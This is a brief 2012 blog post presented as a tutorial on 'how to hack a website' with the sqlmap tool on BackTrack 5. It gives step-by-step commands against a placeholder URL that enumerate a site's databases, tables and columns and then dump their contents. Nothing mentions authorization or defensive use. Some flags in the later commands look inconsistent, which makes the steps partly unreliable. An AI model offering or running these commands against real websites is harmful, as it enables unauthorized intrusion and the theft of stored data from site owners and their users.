Thursday, February 23, 2012

How to SQL Inject with SQLMAP on Backtrack5 RC1




Since alot of people don't know how to SQL Inject a website using sqlmap i have made this video and explain how to hack a website using sqlmap.

Steps:
cd /pentest/database/sqlmap
python sqlmap.py -u http://site.com/page.php?id=2 --dbs
python sqlmap.py -u http://site.com/page.php?id=2 -D databasenamehere --tables
python sqlmap.py -u http://site.com/page.php?id=2 -T tablesnamehere --columns
python sqlmap.py -u http://site.com/page.php?id=2 -T tablesnamehere -U test --dump

No comments:

Post a Comment